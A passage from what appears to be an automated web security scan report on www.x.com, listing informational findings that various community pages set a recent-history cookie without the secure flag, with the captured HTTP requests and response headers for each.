2.7. https://www.x.com/community/ppx/adaptive_payments  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/adaptive_payments

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/adaptive_payments HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031303b31342c323031393b31342c323237303b31342c323237363b31342c323030353b31342c323030373b31342c323030343b31342c323131343b31342c323030333b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:31 GMT; Path=/
Vary: User-Agent
JP: D=110512 t=1313157031704201
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.8. https://www.x.com/community/ppx/apps101  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/apps101

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/apps101 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033373b31342c323033303b31342c323032383b31342c323032373b31342c323032393b31342c323036333b31342c323032363b31342c323032303b31342c323031383b31342c323031373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:02 GMT; Path=/
Vary: User-Agent
JP: D=126957 t=1313157062588323
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.9. https://www.x.com/community/ppx/authentication  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/authentication

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/authentication HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031393b31342c323237303b31342c323237363b31342c323030353b31342c323030373b31342c323030343b31342c323131343b31342c323030333b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:31 GMT; Path=/
Vary: User-Agent
JP: D=114393 t=1313157031269098
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.10. https://www.x.com/community/ppx/businesspayments  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/businesspayments

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/businesspayments HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:17 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134333b31342c323134353b31342c323034373b31342c323030353b31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b31342c323030343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=142422 t=1313157077938365
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.11. https://www.x.com/community/ppx/button_manager  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/button_manager

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/button_manager HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/dev-tools
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:40:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b; Expires=Sun, 11-Sep-2011 13:40:03 GMT; Path=/
Vary: User-Agent
JP: D=263918 t=1313156403269344
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.12. https://www.x.com/community/ppx/code_samples  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/code_samples

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/code_samples HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032353b31342c323032333b31342c323033343b31342c323036333b31342c323032343b31342c323036343b31342c323032323b31342c323033323b31342c323033373b31342c323033303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:06 GMT; Path=/
Vary: User-Agent
JP: D=282830 t=1313157065903868
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.13. https://www.x.com/community/ppx/dev-tools  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/dev-tools

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/dev-tools HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/xspaces?view=documents
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b; Expires=Sun, 11-Sep-2011 13:39:59 GMT; Path=/
Vary: User-Agent
JP: D=80199 t=1313156399568143
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.14. https://www.x.com/community/ppx/dev-tools/decision_tree  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/dev-tools/decision_tree

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/dev-tools/decision_tree HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:22 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323135343b31342c323131353b31342c323131313b31342c323232363b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b31342c323134363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=61135 t=1313157083274538
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.15. https://www.x.com/community/ppx/devchallenge  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devchallenge

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/devchallenge HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:21 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131353b31342c323038363b31342c323134393b31342c323131313b31342c323038323b31342c323030353b31342c323134343b31342c323134363b31342c323134323b31342c323134333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:21 GMT; Path=/
Vary: User-Agent
JP: D=53170 t=1313157081752731
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.16. https://www.x.com/community/ppx/devchallenge/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devchallenge/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/devchallenge/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:22 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131353b31342c323131313b31342c323232363b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b31342c323134363b31342c323134323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=56010 t=1313157082994090
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.17. https://www.x.com/community/ppx/developer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/developer

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/developer HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:23 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323037333b31342c323135343b31342c323131353b31342c323131313b31342c323232363b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=127401 t=1313157083736368
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.18. https://www.x.com/community/ppx/devtalk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devtalk

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/devtalk HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:20 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131313b31342c323134393b31342c323038323b31342c323131353b31342c323038363b31342c323030353b31342c323134343b31342c323134363b31342c323134323b31342c323134333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:21 GMT; Path=/
Vary: User-Agent
JP: D=227171 t=1313157081321481
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.19. https://www.x.com/community/ppx/devzone  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devzone

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/devzone HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:06 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323133333b31342c323032343b31342c323131343b31342c323033343b31342c323032353b31342c323036333b31342c323032333b31342c323036343b31342c323032323b31342c323033323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:07 GMT; Path=/
Vary: User-Agent
JP: D=144424 t=1313157066963707
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.20. https://www.x.com/community/ppx/documentation  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/documentation

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/documentation HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323032323b31342c323036343b31342c323036333b31342c323033323b31342c323033373b31342c323033303b31342c323032393b31342c323032383b31342c323032373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:04 GMT; Path=/
Vary: User-Agent
JP: D=195109 t=1313157064805423
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.21. https://www.x.com/community/ppx/ec  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/ec

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/ec HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/index.jspa
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7238D44EFB679CF81CE553C3866BE5EA.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 01:59:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030383b; Expires=Sun, 11-Sep-2011 01:59:40 GMT; Path=/
Vary: User-Agent
JP: D=109211 t=1313114380657704
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.22. https://www.x.com/community/ppx/feedback  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/feedback

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/feedback HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:19 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323038363b31342c323038323b31342c323134323b31342c323030353b31342c323134343b31342c323134363b31342c323134333b31342c323134353b31342c323034373b31342c323034363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:20 GMT; Path=/
Vary: User-Agent
JP: D=75997 t=1313157080027534
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.23. https://www.x.com/community/ppx/fundraising  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/fundraising

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/fundraising HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:17 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134353b31342c323134323b31342c323030353b31342c323134333b31342c323034373b31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=83960 t=1313157078276262
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.24. https://www.x.com/community/ppx/global  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/showcase
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323131343b31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c35333437343b332c35333735313b332c35333436333b332c38393433393b332c323030383b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:39:04 GMT; Path=/
Vary: User-Agent
JP: D=186175 t=1313156344173833
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.25. https://www.x.com/community/ppx/global/au  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/au

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/au HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033393b31342c323030343b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b31342c323032343b31342c323036333b31342c323036343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:10 GMT; Path=/
Vary: User-Agent
JP: D=67754 t=1313157070067212
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.26. https://www.x.com/community/ppx/global/ca  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/ca

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/ca HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

